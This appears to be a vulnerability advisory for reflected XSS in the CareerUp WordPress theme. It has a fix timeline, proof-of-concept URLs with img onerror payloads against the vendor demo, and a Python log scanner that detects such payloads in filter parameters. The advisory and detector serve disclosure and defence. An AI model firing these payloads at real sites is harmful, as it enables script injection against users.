Description
There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in the CareerUp theme, via the filter parameters.
Edit (WPScanTeam)
May 27th, 2020 - Vendor Contacted by Original Submitter.
May 29th, 2020 - v2.3.0 Released. Unclear if issue fixed.
June 18th, 2020 - Another submitter (Vlad Vector) reported the same issue. Report escalated to Envato.
June 18th, 2020 - v2.3.1 released. Issue confirmed to be fixed.
https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-center-location=&filter-center-latitude=&filter-center-longitude=&filter-distance=50
https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E
https://wpscan.com/vulnerability/a30a1430-c474-4cd1-877c-35c4ab624170
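As an added example (not part of the advisory or the theme's own code), the following Python triages web access logs for requests that carry markup in the `filter-*` parameters shown in the URLs above. It assumes combined log format and that the distance, latitude and longitude filters are numeric in legitimate use; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters needed to close an attribute value or open a tag (triage heuristic).
HTML_META = re.compile(r'[<>"]')
# Assumption: these filters only carry numbers in legitimate use.
NUMERIC_PARAMS = {"filter-distance", "filter-center-latitude",
                  "filter-center-longitude"}
NUMERIC = re.compile(r"-?\d+(\.\d+)?")
# Client address and request target from a combined-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_filters(request_target):
    """Return sorted filter-* parameter names whose decoded value looks injected."""
    hits = set()
    for name, value in parse_qsl(urlsplit(request_target).query,
                                 keep_blank_values=True):
        if not name.startswith("filter-"):
            continue
        if name in NUMERIC_PARAMS:
            # Empty is normal (unused filter); anything non-numeric is not.
            if value and not NUMERIC.fullmatch(value):
                hits.add(name)
        elif HTML_META.search(value):
            hits.add(name)
    return sorted(hits)

def scan_access_log(lines):
    """Return [(client, flagged_params)] for lines with suspicious filter values."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            flagged = suspicious_filters(m.group(2))
            if flagged:
                findings.append((m.group(1), flagged))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jun/2020:10:00:00 +0000] "GET /jobs/?filter-title=developer&filter-center-latitude=&filter-distance=50 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jun/2020:10:00:05 +0000] "GET /jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-distance=50 HTTP/1.1" 200 5300',
    '198.51.100.23 - - [18/Jun/2020:10:00:09 +0000] "GET /jobs/?filter-title=qa&filter-distance=%22%3E%3Cimg%20src=x%3E HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for client, params in scan_access_log(SAMPLE_LOG):
        print(client, params)
```

Hits indicate probing of the filter parameters, not successful script execution; per the timeline above, the issue is confirmed fixed in v2.3.1.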